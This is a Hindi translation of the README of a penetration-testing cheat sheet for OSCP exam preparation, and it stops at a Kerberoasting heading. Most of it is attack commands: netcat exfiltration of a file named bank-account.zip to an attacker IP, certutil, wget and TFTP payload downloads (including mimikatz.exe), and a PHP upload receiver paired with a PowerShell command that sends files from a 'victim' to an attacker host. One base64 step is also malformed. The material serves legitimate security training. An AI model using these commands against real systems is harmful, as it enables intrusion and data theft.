
पीडब्ल्यूके/ओएससीपी परीक्षा की तैयारी के लिए व्यापक पेनिट्रेशन टेस्टिंग चीट शीट, जिसमें विशेषाधिकार वृद्धि, पासवर्ड क्रैकिंग, पेलोड जनरेशन, पोस्ट-एक्सप्लॉइटेशन, पोर्ट स्कैनिंग, वेब हमले और रिकॉनिसेंस तकनीकें शामिल हैं।
JustTryHarder एक चीट शीट है जो PWK कोर्स और OSCP परीक्षा में आपकी सहायता करेगी।
(PayloadAllTheThings से प्रेरित)
बेझिझक एक Pull Request सबमिट करें और अगर इससे आपको मदद मिली हो तो थोड़ा प्यार दिखाने के लिए एक स्टार छोड़ें। 💖
Hacktoberfest के अनुकूल! हाँ, हम Hacktoberfest के लिए Pull Requests के लिए खुले हैं! कृपया सुनिश्चित करें कि यह स्पैम न हो और वास्तव में इस रेपो में अच्छा योगदान दे। धन्यवाद और हैप्पी हैकिंग!
अस्वीकरण: नीचे दी गई कोई भी जानकारी PWK लैब्स / OSCP परीक्षा के स्पॉइलर नहीं है।
मैंने इस जानकारी का अधिकांश भाग अन्य Github रेपो, ब्लॉग, साइटों और अधिक से प्राप्त किया है। मैंने मूल निर्माता को जितना संभव हो उतना श्रेय देने का प्रयास किया है। यदि मैंने आपको श्रेय नहीं दिया है, तो कृपया मुझसे ट्विटर पर संपर्क करें: https://twitter.com/s1nfulz
ping 10.10.10.110 PING 10.10.10.110 (10.10.10.110) 56(84) bytes of data. 64 bytes from 10.10.10.110: icmp_seq=1 ttl=128 time=166 ms
`TTL` का उपयोग होस्ट के OS का पता लगाने के लिए किया जा सकता है। TTL के तीन अलग-अलग प्रकार नीचे दिखाए गए हैं:
- **TTL=64** = \*nix - हॉप काउंट; इसलिए यदि आप 61 प्राप्त कर रहे हैं, तो 3 हॉप्स हैं और यह एक \*nix उपकरण है। सबसे अधिक संभावना लिनक्स है।
- **TTL=128** = विंडोज़ - फिर से, यदि TTL 127 है तो हॉप 1 है और यह एक विंडोज़ बॉक्स है।
- **TTL=254** = Solaris/AIX - यदि TTL 250 है तो हॉप काउंट 4 है और यह एक Solaris बॉक्स है।
## BOF (कार्य प्रगति पर)
(सामान्य खराब वर्णों में शामिल हैं: `0x00`, `0x0A`, `0x0D`)
- फ़ज़िंग
- EIP की स्थिति ढूँढना
- खराब वर्ण ढूँढना
- `jmp esp` का पता लगाना
- `msfvenom` के साथ पेलोड उत्पन्न करना
- `netcat` के साथ रिवर्स शेल प्राप्त करना
**अच्छे BOF संसाधन:**
- [NCC Group - Writing Exploits for Win32](https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2016/june/writing-exploits-for-win32-systems-from-scratch/)
- [Corelan - Exploit Writing Tutorial Part 1](https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/)
- [GitHub - dostackbufferoverflowgood](https://github.com/justinsteven/dostackbufferoverflowgood)
- [VeteranSec - 32-bit Windows Buffer Overflows Made Easy](https://veteransec.com/2018/09/10/32-bit-windows-buffer-overflows-made-easy/)
## ब्रेकआउट / एनवायरनमेंट एस्केप
- [Pentest Partners - सिट्रिक्स से बाहर निकलना](https://www.pentestpartners.com/security-blog/breaking-out-of-citrix-and-other-restricted-desktop-environments/)
- [SRA.io - SiteKiosk ब्रेकआउट](https://sra.io/blog/sitekiosk-breakout/)
- [TrustedSec - किओस्क/POS ब्रेकआउट कीज़](https://www.trustedsec.com/blog/kioskpos-breakout-keys-in-windows/)
- [Cognosec - सिट्रिक्स एनवायरनमेंट से बाहर निकलना](https://cognosec.com/breaking-out-of-citrix-environment/)
- [NetSPI - एप्लिकेशन से बाहर निकलना](https://blog.netspi.com/breaking-out-of-applications-deployed-via-terminal-services-citrix-and-kiosks/)
- [NCC Group - एनवायरनमेंट ब्रेकआउट के साथ सामान्य समस्याएं (PDF)](https://research.nccgroup.com/wp-content/uploads/2020/07/research-insights_common-issues-with-environment-breakouts.pdf)
- [GracefulSecurity - सिट्रिक्स ब्रेकआउट](https://gracefulsecurity.com/citrix-breakout/)
## DNS - ज़ोन ट्रांसफ़र```bash
host -t axfr HTB.local 10.10.10.10
host -l HTB.local 10.10.10.10
host -l <domain name> <name server>
dig @<dns server> <domain> axfr
```
## फ़ाइल स्थानांतरण
### SMB स्थानांतरण
पीड़ित मशीन पर (Windows):```cmd
net share \\10.10.10.10\myshare
net use x:
copy whatever.zip x:
```
### Wget स्थानांतरण
होस्ट से फ़ाइल(फ़ाइलें) कैसे प्राप्त करें (रिवर्स शेल के अंदर).
**सेटअप:** जिस फ़ाइल को आप स्थानांतरित करना चाहते हैं उसे `/var/www/html/` में रखें और `service apache2 start` चलाएँ।
रिमोट सर्वर पर चलाएँ:```bash
wget [http://10.10.10.10/pspy64](http://10.10.10.10/pspy64) # <- for single file
wget -r [http://10.10.10.10/pspy64/](http://10.10.10.10/pspy64/) # <- for folder
```
### TFTP स्थानांतरण
(Kali से Windows में स्थानांतरण कैसे करें)
**MSF का उपयोग करके:**
इन चरणों से पहले MSF प्रारंभ करें:
1. `use auxiliary/server/tftp`
2. `set TFTPROOT /usr/share/mimikatz/Win32/`
3. `run`
**टर्मिनल के अंदर:**
4\. `tftp -i 10.10.10.10 GET mimikatz.exe`
### NetCat (Windows से Kali)
1. **Windows:** `nc -nv 10.11.0.61 4444 < bank-account.zip`
2. **Linux:** `nc -nlvp 4444 > bank-account.zip`
### PowerShell
इंटरैक्टिव सत्र:```powershell
Invoke-WebRequest -Uri [http://127.0.0.1/exploit.py](http://127.0.0.1/exploit.py) -OutFile C:\Users\Victim\exploit.py
```
बिना किसी इंटरैक्टिव PowerShell सत्र के (`wget.ps1` बनाएं):```powershell
$client = New-Object System.Net.WebClient
$path = "C:\path\to\save\file.txt"
$client.DownloadFile($url, $path)
```
### Base64 (Linux -\> Linux)
**स्थानीय होस्ट:**
1. `$(echo "cat /path/to/exploit.py | base64") > encoded.b64`
2. `encoded.b64` को `nc` या अन्य माध्यम से रिमोट सर्वर पर स्थानांतरित करें।
**रिमोट सर्वर - लिनक्स:**
3\. `cat /path/to/encoded.b64 | base64 -d > exploit.py`
### Certutil```cmd
certutil.exe -urlcache -split -f "[http://ip.for.kali.box/file-to-get.zip](http://ip.for.kali.box/file-to-get.zip)" name-to-save-as.zip
```
### HTTP File Upload (Exfiltration)
**1. upload.php बनाएँ**
हमलावर मशीन की webroot में बनाएँ (`/var/www/html` डिफ़ॉल्ट रूप से).```php
<?php
$uploaddir = '/var/www/uploads/';
$uploadfile = $uploaddir . $_FILES['file']['name'];
move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)
?>
```
**2. निर्देशिका बनाएँ**
अपलोड निर्देशिका बनाएँ और अपलोड की अनुमति देने के लिए उचित अनुमतियाँ सेट करें।```bash
sudo mkdir /var/www/uploads && sudo chown www-data:www-data /var/www/uploads
```
**3. फ़ाइल अपलोड करें**
PowerShell का उपयोग करके पीड़ित मशीन से हमला करने वाली मशीन पर फ़ाइल अपलोड करें:```powershell
powershell.exe -exec unrestricted -noprofile -Command "(New-Object System.Net.WebClient).UploadFile('[http://10.10.10.10/upload.php](http://10.10.10.10/upload.php)', 'file-to-upload.txt')"
```
## Kerberoasting